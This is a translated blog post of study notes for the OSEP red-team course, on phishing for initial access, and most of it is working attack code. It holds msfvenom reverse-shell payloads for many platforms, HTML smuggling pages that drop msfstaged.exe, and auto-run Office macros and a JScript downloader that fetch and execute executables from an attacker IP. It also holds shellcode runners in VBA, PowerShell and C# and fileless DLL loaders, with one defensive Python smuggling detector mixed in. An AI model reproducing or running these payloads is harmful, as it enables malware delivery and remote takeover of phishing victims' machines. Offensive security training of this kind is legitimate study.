For the note format and study method, see "OSEP Learning Path | Opening".
This part covers the first section, "phishing attacks". The notes broadly follow the course material, though the chapters do not map one-to-one, because some content is easier to understand once merged.
This is not quite the phishing most classmates have in mind; strictly speaking, the material here is the preparation work that precedes the phish. The key takeaways are summarized below:
1-Phishing techniques
Main content: attack ideas and methods for obtaining system access through social engineering
Main methods: executing a payload to obtain a shell via VBA (Word macros) or JS (Windows Script Host)
1.1-Remote code execution payloads
Generate payloads with msf
List the available payloads
msfvenom -l
1.1.1-Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
1.1.2-Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
1.1.3-Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
1.1.4-PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
1.1.5-ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
1.1.6-JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
1.1.7-WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
1.1.8-Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
1.1.9-Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
1.1.10-Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
1.1.11-Linux Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.1.12-Windows Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.1.13-Mac Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
1.2-Receiving the shell
Use MSF's multi/handler with the payload parameters filled in to receive and manage the shell
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
1.3-HTML smuggling
Direct download
<html>
<body>
<a href="/msfstaged.exe" download="msfstaged.exe">DownloadMe</a>
</body>
</html>
Improved version
<html>
<head>
<title>html smuggling 1</title>
</head>
<body>
<script>
function base64ToArrayBuffer(base64){
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
var file = 'TVqQAAM...';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileaName = 'msfstaged.exe';
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileaName;
a.click();
window.URL.revokeObjectURL(url);
</script>
</body>
</html>
Further improved
<!DOCTYPE html>
<html>
<head>
<title>html smuggling 2</title>
</head>
<body>
<h1>Example 2</h1>
<script>
function base64ToArrayBuffer(base64){
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for(var i = 0; i< len; i ++){ bytes[i] = binary_string.charCodeAt(i);}
return bytes.buffer;
}
var file = "TVqQAAMAAAAEAAA...";
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var filename = 'msfstaged.exe';
navigator.msSaveBlob(blob, filename);
</script>
</body>
</html>
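As an added example (not from the course material), the Python check below flags the smuggling pattern shown above: a base64 literal decoded with atob and delivered through a Blob to an anchor download or msSaveBlob, decoding any long literal to identify the file by its magic bytes (the page's 'TVqQAAM...' prefix is base64 for an MZ header). The HTML samples are constructed inline for the test; the direct-link variant is deliberately not flagged, since nothing is embedded in it.

```python
import base64
import re

# JavaScript delivery primitives used by the inline smuggling variants above.
DELIVERY_PATTERNS = {
    "atob_decode": re.compile(r"\batob\s*\("),
    "blob_object": re.compile(r"new\s+Blob\s*\("),
    "anchor_download": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]"),
    "object_url": re.compile(r"createObjectURL\s*\("),
    "ms_save_blob": re.compile(r"msSaveBlob\s*\("),
}
# A quoted base64 run long enough to be a file body rather than a short token.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{64,}={0,2})['\"]")
FILE_MAGIC = {b"MZ": "PE executable", b"PK\x03\x04": "ZIP/OOXML", b"%PDF": "PDF"}


def classify_payload(data: bytes) -> str:
    """Name the embedded file by its leading magic bytes."""
    for magic, name in FILE_MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def scan_html(html: str) -> dict:
    """Report delivery indicators and any decodable embedded payloads."""
    hits = [n for n, p in DELIVERY_PATTERNS.items() if p.search(html)]
    payloads = []
    for literal in B64_LITERAL.findall(html):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        payloads.append({"size": len(raw), "type": classify_payload(raw)})
    delivered = any(h in hits for h in ("anchor_download", "ms_save_blob", "object_url"))
    suspicious = bool(payloads) and "atob_decode" in hits and "blob_object" in hits and delivered
    return {"indicators": hits, "payloads": payloads, "suspicious": suspicious}


# Constructed sample: 64 bytes that start like a PE (MZ) header, embedded the
# way the "html smuggling 1" page does it. No real executable is included.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00" + b"\x00" * 48
SMUGGLING_HTML = """<html><body><script>
var file = '%s';
var bin = window.atob(file);
var bytes = new Uint8Array(bin.length);
var blob = new Blob([bytes], {type: 'octet/stream'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'msfstaged.exe';
a.click();
</script></body></html>""" % base64.b64encode(FAKE_PE).decode()
# Constructed benign page: a plain download link with nothing embedded.
PLAIN_HTML = '<html><body><a href="/report.pdf" download="report.pdf">Report</a></body></html>'

if __name__ == "__main__":
    for name, page in (("smuggling", SMUGGLING_HTML), ("plain", PLAIN_HTML)):
        print(name, scan_html(page))
```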
1.4-Office phishing
VBA macro code
Sub MyMacro1()
Dim myLong As Long
myLong = 1
If myLong < 5 Then
MsgBox ("True")
Else
MsgBox ("False")
End If
End Sub
Sub MyMacro2()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Sub Document_Open()
MyMacro2
End Sub
Sub AutoOpen()
MyMacro2
End Sub
Sub MyMacro3()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Sub MyMacro4()
Dim str As String
str = "cmd.exe"
CreateObject("Wscript.Shell").Run str, 0
End Sub
Running PowerShell, with a delay before execution
Sub MyMacro3()
Dim str As String
str = "powershell IWR -uri http://192.168.203.214/msfstaged.exe -outfile msfstaged.exe"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + "\msfstaged.exe"
Wait (2)
Shell exePath, vbHide
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
1.5-Using the Win32 API from VBA
Generate shellcode
msfvenom -p windows/meterpreter/reverse_https lhost=<IP> lport=<PORT> exitfunc=thread -f vbapplication
Pay attention to the shellcode bitness (32-bit)
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Sub myMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim data As Long
buf = Array(...)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
1.6-Phishing Pretext
Code
Sub Document_Open()
SubPage
End Sub
Sub AutoOpen()
SubPage
End Sub
Sub SubPage()
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.AttachedTemplate.AutoTextEntries("TheDoc").Insert Where:=Selection.Range, RichText:=True
End Sub
Calling the Win32 API from C#, tested with MessageBox
$User32 = @"
using System;
using System.Runtime.InteropServices;
public class User32{
[DllImport("user32.dll", SetLastError = true, CharSet= CharSet.Auto)]
public static extern int MessageBox(int hWnd, String text, String caption, uint type);
}
"@
Add-Type $User32
[User32]::MessageBox(0, "Test", "BoxTitle",0)
Prepare the shellcode
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 EXITFUNC=thread -f ps1
Assemble the script
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32", CharSet = CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $Kernel32
[Byte[]] $buf = ...
$size = $buf.Length
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size, 0x3000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)
$thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0);
[Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
1.7-Dynamic invocation in PowerShell
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname
The three steps:
1 - Find GetModuleHandle
2 - Load the target DLL
3 - Invoke the target function
1.7.1-GetProcAddress
# Load system.dll
$systemdll = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') })
# Locate all the unsafe methods
$unsafeObj = $systemdll.GetType('Microsoft.Win32.UnsafeNativeMethods')
# find GetModuleHandle
$GetModuleHandle = $unsafeObj.GetMethod('GetModuleHandle')
# Use GetModuleHandle to load a dll, user32.dll
$GetModuleHandle.Invoke($null, @("user32.dll"))
# find GetProcAddress
$GetProcAddress = $unsafeObj.GetMethod('GetProcAddress')
# There are two candidates, so we put them into a list and check each one.
$tmp=@()
$unsafeObj.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
# We just use the first one.
$GetProcAddress = $tmp[0]
$user32 = $GetModuleHandle.Invoke($null, @("user32.dll"))
$GetProcAddress.Invoke($null, @($user32, "MessageBoxA"))
Combined code
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))
}
$MessageBoxA = LookupFunc user32.dll MessageBoxA
$MessageBoxA
1.7.2-GetDelegateType
$MyAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
# Get current domain
$Domain = [AppDomain]::CurrentDomain
# Define as DynamicAssembly, avoid saving to disk
# Provide Run argument, to set it as executable.
$MyAssemblyBuilder = $Domain.DefineDynamicAssembly($MyAssembly,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)
# Create the content
# Create an InMemoryModule and do not include symbols
$MyModuleBuilder = $MyAssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
# Use DefineType to define a delegateType
# class (so we can later instantiate it), public, non-extendable, and use ASCII instead of Unicode
$MyTypeBuilder = $MyModuleBuilder.DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
# Then put function prototype inside this DefineType
# param1: MethodAttributes, 'RTSpecialName, HideBySig, Public', make it public and require it to be referenced by both name and signature
# param2: Calling conventions, here use standard
# param3: arguments for MessageBoxA
$MyConstructorBuilder = $MyTypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, @([IntPtr], [String], [String], [int]))
# SetImplementationFlags, choose Runtime and Managed
$MyConstructorBuilder.SetImplementationFlags('Runtime, Managed')
# Then we want to invoke the function, we should define the settings for a function
# param1:
# choose Public to make it accessible, HideBySig to allow it to be called by both name and signature
# NewSlot, and Virtual to indicate that the method is virtual and ensure that it always gets a new slot in the vtable
# param2: return type for the function
# param3: array of argument types
$MyMethodBuilder = $MyTypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', [int], @([IntPtr],[String], [String], [int]))
# SetImplementationFlags for the method as well, choose Runtime and Managed
$MyMethodBuilder.SetImplementationFlags('Runtime, Managed')
# Finally Create type
$MyDelegateType = $MyTypeBuilder.CreateType()
$MyFunction = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MessageBoxA, $MyDelegateType)
$MyFunction.Invoke([IntPtr]::Zero,"Hello World","This is My MessageBox",0)
1.7.3-Combined code
function getDelegateType{
Param(
[Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
[Parameter(Position = 1)][Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
1.7.4-Final code
function LookupFunc{
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].
Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress"){$tmp+=$_}}
return $tmp[0].Invoke($null,@(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}
function getDelegateType{
Param(
[Parameter(Position = 0, Mandatory = $true)] [Type[]] $func,
[Parameter(Position = 1)][Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke','Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr],[UInt32],[UInt32],[UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000,0x3000,0x40)
[Byte[]] $buf = ...
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
$hThread
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32])([IntPtr]))).Invoke($hThread, 0xFFFFFFFF)
1.8-Phishing with HTA
HTA code
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
1.9-Phishing with WSH
Several file formats need to be tested; note which extensions have a default handler program configured, JSE for example
1.10-Phishing with JS
Generate the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.203.214 LPORT=9000 -f exe > met.exe
JS code
var url = "http://192.168.203.214/met.exe"
var Objects = WScript.CreateObject('MSXML2.XMLHTTP');
Objects.Open('GET', url, false);
Objects.Send();
if (Objects.Status == 200){
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1;
Stream.Write(Objects.ResponseBody);
Stream.Position = 0;
Stream.SaveToFile("met.exe", 2);
Stream.Close();
}
var r = new ActiveXObject("WScript.shell").Run("met.exe");
Double-clicking the file runs it; it can also be run from the command line
c:\windows\system32\mshta.exe xx.js
1.11-Converting a .NET binary into a JS file
Tool used:
https://github.com/tyranid/DotNetToJScript
DotNetToJScript command
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
1.12-Reverse shell from .NET via Win32 API calls
MessageBox test
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ConsoleApp1
{
class Program
{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);
static void Main(string[] args)
{
MessageBox(IntPtr.Zero, "This is my text", "This is my caption", 0);
}
}
}
PInvoke
https://www.pinvoke.net/
Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.203.214 lport=9000 -f csharp
Code that executes the shellcode
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ShellcodeRunner
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
static void Main(string[] args)
{
// Console.WriteLine("START!");
byte[] buf = new byte[510] { ... };
int size = buf.Length;
IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
// Console.WriteLine(hThread);
WaitForSingleObject(hThread, 0xFFFFFFFF);
// Console.WriteLine("END!");
}
}
}
WaitForSingleObject is used because once we create the new thread, the original main thread would otherwise carry on and exit, so we make it wait for the new thread to finish.
Put the above code into JS
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o runner.js
1.13-Other methods: SharpShooter
Tool:
https://github.com/mdsecactivebreach/SharpShooter
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f raw -o shell.txt
python2 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile ./shell.txt --output test
1.14-Loading a DLL with PowerShell
Generate shellcode
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.203.214 lport=443 -f csharp
Compile the DLL
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ClassLibrary1
{
public class Class1
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr
lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
public static void runner()
{
byte[] buf = new byte[510] {...};
int size = buf.Length;
IntPtr addr = VirtualAlloc(IntPtr.Zero, (UInt32)size, 0x3000, 0x40);
Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
}
}
Load the DLL from PowerShell
(New-Object System.Net.WebClient).DownloadFile('http://<IP>/ClassLibrary1.dll','ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::LoadFile("c:\users\admin\ClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
Fileless DLL loading
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.43.140:9999/ClassLibrary1.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
Remote loading
$assem = [System.Reflection.Assembly]::LoadFile("\\192.168.203.128\share\ClassLibrary1.dll")
$class = $assem.getType("ClassLibrary1.Class1")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)
2-Other tips
2.1-Enabling an SMB share
On Kali:
/etc/samba/smb.conf
[share]
path = /home/kali/OSEP/smbshare
browseable = yes
read only = no
Add the user and set its password
smbpasswd -a kali
Using impacket
smbserver.py share . -smb2support
2.2-Installing Visual Studio
After installation, test by compiling the following code
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Hello_World
{
internal class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello World");
}
}
}
2.3-Proxy
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")
Stay disciplined and be your best self
Originally published on the WeChat official account 高级红队专家: OSEP | Phishing Attacks